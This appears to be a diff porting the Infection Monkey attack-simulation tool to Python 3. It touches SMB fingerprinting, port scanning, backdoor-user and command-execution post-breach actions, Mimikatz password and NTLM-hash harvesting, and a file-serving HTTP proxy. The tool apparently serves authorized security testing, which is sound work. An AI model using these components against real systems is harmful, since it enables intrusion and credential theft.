text=True
|
||||
)
|
||||
|
||||
output = " ".join(sub_proc.communicate())
|
||||
regex_result = self._ttl_regex.search(output)
|
||||
|
|
|
@ -12,91 +12,98 @@ SMB_SERVICE = 'tcp-445'
|
|||
LOG = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class Packet(object):
|
||||
class Packet:
|
||||
fields = odict([
|
||||
("data", ""),
|
||||
])
|
||||
|
||||
def __init__(self, **kw):
|
||||
self.fields = odict(self.__class__.fields)
|
||||
for k, v in kw.items():
|
||||
for k, v in list(kw.items()):
|
||||
if callable(v):
|
||||
self.fields[k] = v(self.fields[k])
|
||||
else:
|
||||
self.fields[k] = v
|
||||
|
||||
def __str__(self):
|
||||
return "".join(map(str, self.fields.values()))
|
||||
def to_byte_string(self):
|
||||
content_list = [(x.to_byte_string() if hasattr(x, "to_byte_string") else x) for x in self.fields.values()]
|
||||
return b"".join(content_list)
|
||||
|
||||
|
||||
##### SMB Packets #####
|
||||
# SMB Packets
|
||||
class SMBHeader(Packet):
|
||||
fields = odict([
|
||||
("proto", "\xff\x53\x4d\x42"),
|
||||
("cmd", "\x72"),
|
||||
("errorcode", "\x00\x00\x00\x00"),
|
||||
("flag1", "\x00"),
|
||||
("flag2", "\x00\x00"),
|
||||
("pidhigh", "\x00\x00"),
|
||||
("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
|
||||
("reserved", "\x00\x00"),
|
||||
("tid", "\x00\x00"),
|
||||
("pid", "\x00\x00"),
|
||||
("uid", "\x00\x00"),
|
||||
("mid", "\x00\x00"),
|
||||
("proto", b"\xff\x53\x4d\x42"),
|
||||
("cmd", b"\x72"),
|
||||
("errorcode", b"\x00\x00\x00\x00"),
|
||||
("flag1", b"\x00"),
|
||||
("flag2", b"\x00\x00"),
|
||||
("pidhigh", b"\x00\x00"),
|
||||
("signature", b"\x00\x00\x00\x00\x00\x00\x00\x00"),
|
||||
("reserved", b"\x00\x00"),
|
||||
("tid", b"\x00\x00"),
|
||||
("pid", b"\x00\x00"),
|
||||
("uid", b"\x00\x00"),
|
||||
("mid", b"\x00\x00"),
|
||||
])
|
||||
|
||||
|
||||
class SMBNego(Packet):
|
||||
fields = odict([
|
||||
("wordcount", "\x00"),
|
||||
("bcc", "\x62\x00"),
|
||||
("wordcount", b"\x00"),
|
||||
("bcc", b"\x62\x00"),
|
||||
("data", "")
|
||||
])
|
||||
|
||||
def calculate(self):
|
||||
self.fields["bcc"] = struct.pack("<h", len(str(self.fields["data"])))
|
||||
self.fields["bcc"] = struct.pack("<h", len(self.fields["data"].to_byte_string()))
|
||||
|
||||
|
||||
class SMBNegoFingerData(Packet):
|
||||
fields = odict([
|
||||
("separator1", "\x02"),
|
||||
("dialect1", "\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00"),
|
||||
("separator2", "\x02"),
|
||||
("dialect2", "\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"),
|
||||
("separator3", "\x02"),
|
||||
("separator1", b"\x02"),
|
||||
("dialect1", b"\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00"),
|
||||
("separator2", b"\x02"),
|
||||
("dialect2", b"\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"),
|
||||
("separator3", b"\x02"),
|
||||
("dialect3",
|
||||
"\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00"),
|
||||
("separator4", "\x02"),
|
||||
("dialect4", "\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00"),
|
||||
("separator5", "\x02"),
|
||||
("dialect5", "\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00"),
|
||||
("separator6", "\x02"),
|
||||
("dialect6", "\x4e\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"),
|
||||
b"\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00"),
|
||||
("separator4", b"\x02"),
|
||||
("dialect4", b"\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00"),
|
||||
("separator5", b"\x02"),
|
||||
("dialect5", b"\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00"),
|
||||
("separator6", b"\x02"),
|
||||
("dialect6", b"\x4e\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"),
|
||||
])
|
||||
|
||||
|
||||
class SMBSessionFingerData(Packet):
|
||||
fields = odict([
|
||||
("wordcount", "\x0c"),
|
||||
("AndXCommand", "\xff"),
|
||||
("reserved", "\x00"),
|
||||
("andxoffset", "\x00\x00"),
|
||||
("maxbuff", "\x04\x11"),
|
||||
("maxmpx", "\x32\x00"),
|
||||
("vcnum", "\x00\x00"),
|
||||
("sessionkey", "\x00\x00\x00\x00"),
|
||||
("securitybloblength", "\x4a\x00"),
|
||||
("reserved2", "\x00\x00\x00\x00"),
|
||||
("capabilities", "\xd4\x00\x00\xa0"),
|
||||
("wordcount", b"\x0c"),
|
||||
("AndXCommand", b"\xff"),
|
||||
("reserved", b"\x00"),
|
||||
("andxoffset", b"\x00\x00"),
|
||||
("maxbuff", b"\x04\x11"),
|
||||
("maxmpx", b"\x32\x00"),
|
||||
("vcnum", b"\x00\x00"),
|
||||
("sessionkey", b"\x00\x00\x00\x00"),
|
||||
("securitybloblength", b"\x4a\x00"),
|
||||
("reserved2", b"\x00\x00\x00\x00"),
|
||||
("capabilities", b"\xd4\x00\x00\xa0"),
|
||||
("bcc1", ""),
|
||||
("Data",
|
||||
"\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"),
|
||||
b"\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02"
|
||||
b"\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00"
|
||||
b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f"
|
||||
b"\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63"
|
||||
b"\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00"
|
||||
b"\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35"
|
||||
b"\x00\x2e\x00\x31\x00\x00\x00\x00\x00"),
|
||||
|
||||
])
|
||||
|
||||
def calculate(self):
|
||||
self.fields["bcc1"] = struct.pack("<i", len(str(self.fields["Data"])))[:2]
|
||||
self.fields["bcc1"] = struct.pack("<i", len(self.fields["Data"]))[:2]
|
||||
|
||||
|
||||
class SMBFinger(HostFinger):
|
||||
|
@ -116,31 +123,30 @@ class SMBFinger(HostFinger):
|
|||
|
||||
self.init_service(host.services, SMB_SERVICE, SMB_PORT)
|
||||
|
||||
h = SMBHeader(cmd="\x72", flag1="\x18", flag2="\x53\xc8")
|
||||
h = SMBHeader(cmd=b"\x72", flag1=b"\x18", flag2=b"\x53\xc8")
|
||||
n = SMBNego(data=SMBNegoFingerData())
|
||||
n.calculate()
|
||||
|
||||
Packet = str(h) + str(n)
|
||||
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
|
||||
s.send(Buffer)
|
||||
packet_ = h.to_byte_string() + n.to_byte_string()
|
||||
buffer = struct.pack(">i", len(packet_)) + packet_
|
||||
s.send(buffer)
|
||||
data = s.recv(2048)
|
||||
|
||||
if data[8:10] == "\x72\x00":
|
||||
Header = SMBHeader(cmd="\x73", flag1="\x18", flag2="\x17\xc8", uid="\x00\x00")
|
||||
Body = SMBSessionFingerData()
|
||||
Body.calculate()
|
||||
if data[8:10] == b"\x72\x00":
|
||||
header = SMBHeader(cmd=b"\x73", flag1=b"\x18", flag2=b"\x17\xc8", uid=b"\x00\x00")
|
||||
body = SMBSessionFingerData()
|
||||
body.calculate()
|
||||
|
||||
Packet = str(Header) + str(Body)
|
||||
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
|
||||
packet_ = header.to_byte_string() + body.to_byte_string()
|
||||
buffer = struct.pack(">i", len(packet_)) + packet_
|
||||
|
||||
s.send(Buffer)
|
||||
s.send(buffer)
|
||||
data = s.recv(2048)
|
||||
|
||||
if data[8:10] == "\x73\x16":
|
||||
if data[8:10] == b"\x73\x16":
|
||||
length = struct.unpack('<H', data[43:45])[0]
|
||||
pack = tuple(data[47 + length:].split('\x00\x00\x00'))[:2]
|
||||
os_version, service_client = tuple(
|
||||
[e.replace('\x00', '') for e in data[47 + length:].split('\x00\x00\x00')[:2]])
|
||||
[e.replace(b'\x00', b'').decode() for e in data[47 + length:].split(b'\x00\x00\x00')[:2]])
|
||||
|
||||
if os_version.lower() != 'unix':
|
||||
host.os['type'] = 'windows'
|
||||
|
|
|
@ -36,7 +36,7 @@ class SSHFinger(HostFinger):
|
|||
def get_host_fingerprint(self, host):
|
||||
assert isinstance(host, VictimHost)
|
||||
|
||||
for name, data in host.services.items():
|
||||
for name, data in list(host.services.items()):
|
||||
banner = data.get('banner', '')
|
||||
if self._banner_regex.search(banner):
|
||||
self._banner_match(name, host, banner)
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
from itertools import izip_longest
|
||||
from itertools import zip_longest
|
||||
from random import shuffle
|
||||
|
||||
import infection_monkey.config
|
||||
|
@ -11,7 +11,6 @@ BANNER_READ = 1024
|
|||
|
||||
|
||||
class TcpScanner(HostScanner, HostFinger):
|
||||
|
||||
_SCANNED_SERVICE = 'unknown(TCP)'
|
||||
|
||||
def __init__(self):
|
||||
|
@ -25,7 +24,8 @@ class TcpScanner(HostScanner, HostFinger):
|
|||
Scans a target host to see if it's alive using the tcp_target_ports specified in the configuration.
|
||||
:param host: VictimHost structure
|
||||
:param only_one_port: Currently unused.
|
||||
:return: T/F if there is at least one open port. In addition, the host object is updated to mark those services as alive.
|
||||
:return: T/F if there is at least one open port.
|
||||
In addition, the host object is updated to mark those services as alive.
|
||||
"""
|
||||
|
||||
# maybe hide under really bad detection systems
|
||||
|
@ -34,7 +34,7 @@ class TcpScanner(HostScanner, HostFinger):
|
|||
|
||||
ports, banners = check_tcp_ports(host.ip_addr, target_ports, self._config.tcp_scan_timeout / 1000.0,
|
||||
self._config.tcp_scan_get_banner)
|
||||
for target_port, banner in izip_longest(ports, banners, fillvalue=None):
|
||||
for target_port, banner in zip_longest(ports, banners, fillvalue=None):
|
||||
service = tcp_port_to_service(target_port)
|
||||
self.init_service(host.services, service, target_port)
|
||||
if banner:
|
||||
|
|
|
@ -7,8 +7,7 @@ import struct
|
|||
import time
|
||||
import re
|
||||
|
||||
from six.moves import range
|
||||
|
||||
from infection_monkey.network.info import get_routes
|
||||
from infection_monkey.pyinstaller_utils import get_binary_file_path
|
||||
from infection_monkey.utils.environment import is_64bit_python
|
||||
|
||||
|
@ -42,7 +41,7 @@ def struct_unpack_tracker_string(data, index):
|
|||
:param index: Position index
|
||||
:return: (Data, new index)
|
||||
"""
|
||||
ascii_len = data[index:].find('\0')
|
||||
ascii_len = data[index:].find(b'\0')
|
||||
fmt = "%ds" % ascii_len
|
||||
return struct_unpack_tracker(data, index, fmt)
|
||||
|
||||
|
@ -73,7 +72,7 @@ def check_tcp_port(ip, port, timeout=DEFAULT_TIMEOUT, get_banner=False):
|
|||
if get_banner:
|
||||
read_ready, _, _ = select.select([sock], [], [], timeout)
|
||||
if len(read_ready) > 0:
|
||||
banner = sock.recv(BANNER_READ)
|
||||
banner = sock.recv(BANNER_READ).decode()
|
||||
except socket.error:
|
||||
pass
|
||||
|
||||
|
@ -96,7 +95,7 @@ def check_udp_port(ip, port, timeout=DEFAULT_TIMEOUT):
|
|||
is_open = False
|
||||
|
||||
try:
|
||||
sock.sendto("-", (ip, port))
|
||||
sock.sendto(b"-", (ip, port))
|
||||
data, _ = sock.recvfrom(BANNER_READ)
|
||||
is_open = True
|
||||
except socket.error:
|
||||
|
@ -116,7 +115,7 @@ def check_tcp_ports(ip, ports, timeout=DEFAULT_TIMEOUT, get_banner=False):
|
|||
:return: list of open ports. If get_banner=True, then a matching list of banners.
|
||||
"""
|
||||
sockets = [socket.socket(socket.AF_INET, socket.SOCK_STREAM) for _ in range(len(ports))]
|
||||
[s.setblocking(0) for s in sockets]
|
||||
[s.setblocking(False) for s in sockets]
|
||||
possible_ports = []
|
||||
connected_ports_sockets = []
|
||||
try:
|
||||
|
@ -160,8 +159,8 @@ def check_tcp_ports(ip, ports, timeout=DEFAULT_TIMEOUT, get_banner=False):
|
|||
banners = []
|
||||
if get_banner and (len(connected_ports_sockets) != 0):
|
||||
readable_sockets, _, _ = select.select([s[1] for s in connected_ports_sockets], [], [], 0)
|
||||
# read first BANNER_READ bytes
|
||||
banners = [sock.recv(BANNER_READ) if sock in readable_sockets else ""
|
||||
# read first BANNER_READ bytes. We ignore errors because service might not send a decodable byte string.
|
||||
banners = [sock.recv(BANNER_READ).decode(errors='ignore') if sock in readable_sockets else ""
|
||||
for port, sock in connected_ports_sockets]
|
||||
pass
|
||||
# try to cleanup
|
||||
|
@ -271,3 +270,42 @@ def _traceroute_linux(target_ip, ttl):
|
|||
lines = [x[1:-1] if x else None # Removes parenthesis
|
||||
for x in lines]
|
||||
return lines
|
||||
|
||||
|
||||
def get_interface_to_target(dst):
|
||||
"""
|
||||
:param dst: destination IP address string without port. E.G. '192.168.1.1.'
|
||||
:return: IP address string of an interface that can connect to the target. E.G. '192.168.1.4.'
|
||||
"""
|
||||
if sys.platform == "win32":
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
try:
|
||||
s.connect((dst, 1))
|
||||
ip_to_dst = s.getsockname()[0]
|
||||
except KeyError:
|
||||
LOG.debug("Couldn't get an interface to the target, presuming that target is localhost.")
|
||||
ip_to_dst = '127.0.0.1'
|
||||
finally:
|
||||
s.close()
|
||||
return ip_to_dst
|
||||
else:
|
||||
# based on scapy implementation
|
||||
|
||||
def atol(x):
|
||||
ip = socket.inet_aton(x)
|
||||
return struct.unpack("!I", ip)[0]
|
||||
|
||||
routes = get_routes()
|
||||
dst = atol(dst)
|
||||
paths = []
|
||||
for d, m, gw, i, a in routes:
|
||||
aa = atol(a)
|
||||
if aa == dst:
|
||||
paths.append((0xffffffff, ("lo", a, "0.0.0.0")))
|
||||
if (dst & m) == (d & m):
|
||||
paths.append((m, (i, a, gw)))
|
||||
if not paths:
|
||||
return None
|
||||
paths.sort()
|
||||
ret = paths[-1][1]
|
||||
return ret[1]
|
|
@ -13,4 +13,3 @@ class BackdoorUser(PBA):
|
|||
POST_BREACH_BACKDOOR_USER,
|
||||
linux_cmd=' '.join(linux_cmds),
|
||||
windows_cmd=windows_cmds)
|
||||
|
||||
|
|
|
@ -1,5 +1,4 @@
|
|||
import logging
|
||||
import os
|
||||
import random
|
||||
import string
|
||||
import subprocess
|
||||
|
@ -39,7 +38,7 @@ class CommunicateAsNewUser(PBA):
|
|||
exit_status = new_user.run_as(ping_commandline)
|
||||
self.send_ping_result_telemetry(exit_status, ping_commandline, username)
|
||||
except subprocess.CalledProcessError as e:
|
||||
PostBreachTelem(self, (e.output, False)).send()
|
||||
PostBreachTelem(self, (e.output.decode(), False)).send()
|
||||
except NewUserError as e:
|
||||
PostBreachTelem(self, (str(e), False)).send()
|
||||
|
||||
|
|
|
@ -9,7 +9,7 @@ from infection_monkey.config import WormConfiguration
|
|||
from infection_monkey.utils.monkey_dir import get_monkey_dir_path
|
||||
from infection_monkey.telemetry.attack.t1105_telem import T1105Telem
|
||||
from common.utils.attack_utils import ScanStatus
|
||||
from infection_monkey.exploit.tools.helpers import get_interface_to_target
|
||||
from infection_monkey.network.tools import get_interface_to_target
|
||||
|
||||
LOG = logging.getLogger(__name__)
|
||||
|
||||
|
@ -27,6 +27,7 @@ class UsersPBA(PBA):
|
|||
"""
|
||||
Defines user's configured post breach action.
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
super(UsersPBA, self).__init__(POST_BREACH_FILE_EXECUTION)
|
||||
self.filename = ''
|
||||
|
|
|
@ -7,17 +7,18 @@ from infection_monkey.utils.environment import is_windows_os
|
|||
from infection_monkey.config import WormConfiguration
|
||||
from infection_monkey.telemetry.attack.t1064_telem import T1064Telem
|
||||
|
||||
|
||||
LOG = logging.getLogger(__name__)
|
||||
|
||||
__author__ = 'VakarisZ'
|
||||
|
||||
EXECUTION_WITHOUT_OUTPUT = "(PBA execution produced no output)"
|
||||
|
||||
|
||||
class PBA(object):
|
||||
"""
|
||||
Post breach action object. Can be extended to support more than command execution on target machine.
|
||||
"""
|
||||
|
||||
def __init__(self, name="unknown", linux_cmd="", windows_cmd=""):
|
||||
"""
|
||||
:param name: Name of post breach action.
|
||||
|
@ -75,13 +76,13 @@ class PBA(object):
|
|||
:return: Tuple of command's output string and boolean, indicating if it succeeded
|
||||
"""
|
||||
try:
|
||||
output = subprocess.check_output(self.command, stderr=subprocess.STDOUT, shell=True)
|
||||
output = subprocess.check_output(self.command, stderr=subprocess.STDOUT, shell=True).decode()
|
||||
if not output:
|
||||
output = EXECUTION_WITHOUT_OUTPUT
|
||||
return output, True
|
||||
except subprocess.CalledProcessError as e:
|
||||
# Return error output of the command
|
||||
return e.output, False
|
||||
return e.output.decode(), False
|
||||
|
||||
@staticmethod
|
||||
def choose_command(linux_cmd, windows_cmd):
|
||||
|
|
|
@ -16,6 +16,7 @@ class PostBreach(object):
|
|||
"""
|
||||
This class handles post breach actions execution
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
self.os_is_linux = not is_windows_os()
|
||||
self.pba_list = self.config_to_pba_list()
|
||||
|
|
|
@ -1,7 +1,6 @@
|
|||
import os
|
||||
import sys
|
||||
|
||||
|
||||
__author__ = 'itay.mizeretz'
|
||||
|
||||
|
||||
|
|
|
@ -1,17 +1,14 @@
|
|||
enum34
|
||||
impacket
|
||||
pycryptodome
|
||||
cffi
|
||||
requests
|
||||
odict
|
||||
paramiko
|
||||
psutil==3.4.2
|
||||
psutil
|
||||
PyInstaller
|
||||
six
|
||||
ecdsa
|
||||
netifaces
|
||||
ipaddress
|
||||
wmi
|
||||
pymssql
|
||||
pyftpdlib
|
||||
enum34
|
||||
|
|
|
@ -1,13 +1,11 @@
|
|||
enum34
|
||||
impacket
|
||||
pycryptodome
|
||||
cffi
|
||||
requests
|
||||
odict
|
||||
paramiko
|
||||
psutil==3.4.2
|
||||
psutil
|
||||
PyInstaller
|
||||
six
|
||||
ecdsa
|
||||
netifaces
|
||||
ipaddress
|
||||
|
@ -15,4 +13,3 @@ wmi
|
|||
pywin32
|
||||
pymssql
|
||||
pyftpdlib
|
||||
enum34
|
||||
|
|
|
@ -16,7 +16,8 @@ LOG = logging.getLogger(__name__)
|
|||
try:
|
||||
WindowsError
|
||||
except NameError:
|
||||
WindowsError = None
|
||||
# noinspection PyShadowingBuiltins
|
||||
WindowsError = psutil.AccessDenied
|
||||
|
||||
__author__ = 'uri'
|
||||
|
||||
|
@ -34,10 +35,10 @@ class SystemInfoCollector(object):
|
|||
def __init__(self):
|
||||
self.os = SystemInfoCollector.get_os()
|
||||
if OperatingSystem.Windows == self.os:
|
||||
from windows_info_collector import WindowsInfoCollector
|
||||
from .windows_info_collector import WindowsInfoCollector
|
||||
self.collector = WindowsInfoCollector()
|
||||
else:
|
||||
from linux_info_collector import LinuxInfoCollector
|
||||
from .linux_info_collector import LinuxInfoCollector
|
||||
self.collector = LinuxInfoCollector()
|
||||
|
||||
def get_info(self):
|
||||
|
|
|
@ -26,4 +26,3 @@ class LinuxInfoCollector(InfoCollector):
|
|||
super(LinuxInfoCollector, self).get_info()
|
||||
self.info['ssh_info'] = SSHCollector.get_info()
|
||||
return self.info
|
||||
|
||||
|
|
|
@ -27,7 +27,7 @@ class MimikatzCollector(object):
|
|||
MIMIKATZ_ZIP_NAME = 'tmpzipfile123456.zip'
|
||||
|
||||
# Password to Mimikatz zip file
|
||||
MIMIKATZ_ZIP_PASSWORD = r'VTQpsJPXgZuXhX6x3V84G'
|
||||
MIMIKATZ_ZIP_PASSWORD = b'VTQpsJPXgZuXhX6x3V84G'
|
||||
|
||||
def __init__(self):
|
||||
self._config = infection_monkey.config.WormConfiguration
|
||||
|
@ -78,11 +78,11 @@ class MimikatzCollector(object):
|
|||
|
||||
for i in range(entry_count):
|
||||
entry = self._get()
|
||||
username = entry.username.encode('utf-8').strip()
|
||||
username = entry.username
|
||||
|
||||
password = entry.password.encode('utf-8').strip()
|
||||
lm_hash = binascii.hexlify(bytearray(entry.lm_hash))
|
||||
ntlm_hash = binascii.hexlify(bytearray(entry.ntlm_hash))
|
||||
password = entry.password
|
||||
lm_hash = binascii.hexlify(bytearray(entry.lm_hash)).decode()
|
||||
ntlm_hash = binascii.hexlify(bytearray(entry.ntlm_hash)).decode()
|
||||
|
||||
if 0 == len(password):
|
||||
has_password = False
|
||||
|
|
|
@ -36,7 +36,7 @@ class WindowsInfoCollector(InfoCollector):
|
|||
"""
|
||||
LOG.debug("Running Windows collector")
|
||||
super(WindowsInfoCollector, self).get_info()
|
||||
#self.get_wmi_info()
|
||||
# TODO: Think about returning self.get_wmi_info()
|
||||
self.get_installed_packages()
|
||||
from infection_monkey.config import WormConfiguration
|
||||
if WormConfiguration.should_use_mimikatz:
|
||||
|
|
|
@ -29,4 +29,3 @@ WMI_LDAP_CLASSES = {"ds_user": ("DS_sAMAccountName", "DS_userPrincipalName",
|
|||
"DS_sAMAccountType", "DS_servicePrincipalName", "DS_userAccountControl",
|
||||
"DS_whenChanged", "DS_whenCreated"),
|
||||
}
|
||||
|
||||
|
|
|
@ -5,15 +5,12 @@ from abc import ABCMeta, abstractmethod
|
|||
|
||||
from infection_monkey.config import WormConfiguration
|
||||
|
||||
|
||||
__author__ = 'itamar'
|
||||
|
||||
LOG = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class _SystemSingleton(object):
|
||||
__metaclass__ = ABCMeta
|
||||
|
||||
class _SystemSingleton(object, metaclass=ABCMeta):
|
||||
@property
|
||||
@abstractmethod
|
||||
def locked(self):
|
||||
|
@ -42,7 +39,7 @@ class WindowsSystemSingleton(_SystemSingleton):
|
|||
|
||||
handle = ctypes.windll.kernel32.CreateMutexA(None,
|
||||
ctypes.c_bool(True),
|
||||
ctypes.c_char_p(self._mutex_name))
|
||||
ctypes.c_char_p(self._mutex_name.encode()))
|
||||
last_error = ctypes.windll.kernel32.GetLastError()
|
||||
|
||||
if not handle:
|
||||
|
|
|
@ -9,13 +9,11 @@ logger = logging.getLogger(__name__)
|
|||
__author__ = 'itay.mizeretz'
|
||||
|
||||
|
||||
class BaseTelem(object):
|
||||
class BaseTelem(object, metaclass=abc.ABCMeta):
|
||||
"""
|
||||
Abstract base class for telemetry.
|
||||
"""
|
||||
|
||||
__metaclass__ = abc.ABCMeta
|
||||
|
||||
def __init__(self):
|
||||
pass
|
||||
|
||||
|
@ -27,7 +25,8 @@ class BaseTelem(object):
|
|||
logger.debug("Sending {} telemetry. Data: {}".format(self.telem_category, json.dumps(data)))
|
||||
ControlClient.send_telemetry(self.telem_category, data)
|
||||
|
||||
@abc.abstractproperty
|
||||
@property
|
||||
@abc.abstractmethod
|
||||
def telem_category(self):
|
||||
"""
|
||||
:return: Telemetry type
|
||||
|
@ -35,7 +34,7 @@ class BaseTelem(object):
|
|||
pass
|
||||
|
||||
@abc.abstractmethod
|
||||
def get_data(self):
|
||||
def get_data(self) -> dict:
|
||||
"""
|
||||
:return: Data of telemetry (should be dict)
|
||||
"""
|
||||
|
|
|
@ -1,4 +1,3 @@
|
|||
from infection_monkey.transport.http import HTTPServer, LockedHTTPServer
|
||||
|
||||
|
||||
__author__ = 'hoffer'
|
||||
|
|
|
@ -1,22 +1,22 @@
|
|||
import BaseHTTPServer
|
||||
import http.server
|
||||
import os.path
|
||||
import select
|
||||
import socket
|
||||
import threading
|
||||
import urllib
|
||||
from logging import getLogger
|
||||
from urlparse import urlsplit
|
||||
from urllib.parse import urlsplit
|
||||
|
||||
import infection_monkey.monkeyfs as monkeyfs
|
||||
from infection_monkey.transport.base import TransportProxyBase, update_last_serve_time
|
||||
from infection_monkey.exploit.tools.helpers import get_interface_to_target
|
||||
from infection_monkey.network.tools import get_interface_to_target
|
||||
|
||||
__author__ = 'hoffer'
|
||||
|
||||
LOG = getLogger(__name__)
|
||||
|
||||
|
||||
class FileServHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
|
||||
class FileServHTTPRequestHandler(http.server.BaseHTTPRequestHandler):
|
||||
protocol_version = "HTTP/1.1"
|
||||
filename = ""
|
||||
|
||||
|
@ -61,10 +61,9 @@ class FileServHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
|
|||
f.close()
|
||||
|
||||
def send_head(self):
|
||||
if self.path != '/' + urllib.quote(os.path.basename(self.filename)):
|
||||
if self.path != '/' + urllib.parse.quote(os.path.basename(self.filename)):
|
||||
self.send_error(500, "")
|
||||
return None, 0, 0
|
||||
f = None
|
||||
try:
|
||||
f = monkeyfs.open(self.filename, 'rb')
|
||||
except IOError:
|
||||
|
@ -100,13 +99,13 @@ class FileServHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
|
|||
self.end_headers()
|
||||
return f, start_range, end_range
|
||||
|
||||
def log_message(self, format, *args):
|
||||
def log_message(self, format_string, *args):
|
||||
LOG.debug("FileServHTTPRequestHandler: %s - - [%s] %s" % (self.address_string(),
|
||||
self.log_date_time_string(),
|
||||
format % args))
|
||||
format_string % args))
|
||||
|
||||
|
||||
class HTTPConnectProxyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
|
||||
class HTTPConnectProxyHandler(http.server.BaseHTTPRequestHandler):
|
||||
timeout = 30 # timeout with clients, set to None not to make persistent connection
|
||||
proxy_via = None # pseudonym of the proxy in Via header, set to None not to modify original Via header
|
||||
protocol_version = "HTTP/1.1"
|
||||
|
@ -117,7 +116,6 @@ class HTTPConnectProxyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
|
|||
def do_CONNECT(self):
|
||||
# just provide a tunnel, transfer the data with no modification
|
||||
req = self
|
||||
reqbody = None
|
||||
req.path = "https://%s/" % req.path.replace(':443', '')
|
||||
|
||||
u = urlsplit(req.path)
|
||||
|
@ -148,9 +146,9 @@ class HTTPConnectProxyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
|
|||
update_last_serve_time()
|
||||
conn.close()
|
||||
|
||||
def log_message(self, format, *args):
|
||||
def log_message(self, format_string, *args):
|
||||
LOG.debug("HTTPConnectProxyHandler: %s - [%s] %s" %
|
||||
(self.address_string(), self.log_date_time_string(), format % args))
|
||||
(self.address_string(), self.log_date_time_string(), format_string % args))
|
||||
|
||||
|
||||
class HTTPServer(threading.Thread):
|
||||
|
@ -182,7 +180,7 @@ class HTTPServer(threading.Thread):
|
|||
return True
|
||||
return False
|
||||
|
||||
httpd = BaseHTTPServer.HTTPServer((self._local_ip, self._local_port), TempHandler)
|
||||
httpd = http.server.HTTPServer((self._local_ip, self._local_port), TempHandler)
|
||||
httpd.timeout = 0.5 # this is irrelevant?
|
||||
|
||||
while not self._stopped and self.downloads < self.max_downloads:
|
||||
|
@ -235,7 +233,7 @@ class LockedHTTPServer(threading.Thread):
|
|||
return True
|
||||
return False
|
||||
|
||||
httpd = BaseHTTPServer.HTTPServer((self._local_ip, self._local_port), TempHandler)
|
||||
httpd = http.server.HTTPServer((self._local_ip, self._local_port), TempHandler)
|
||||
self.lock.release()
|
||||
while not self._stopped and self.downloads < self.max_downloads:
|
||||
httpd.handle_request()
|
||||
|
@ -249,7 +247,7 @@ class LockedHTTPServer(threading.Thread):
|
|||
|
||||
class HTTPConnectProxy(TransportProxyBase):
|
||||
def run(self):
|
||||
httpd = BaseHTTPServer.HTTPServer((self.local_host, self.local_port), HTTPConnectProxyHandler)
|
||||
httpd = http.server.HTTPServer((self.local_host, self.local_port), HTTPConnectProxyHandler)
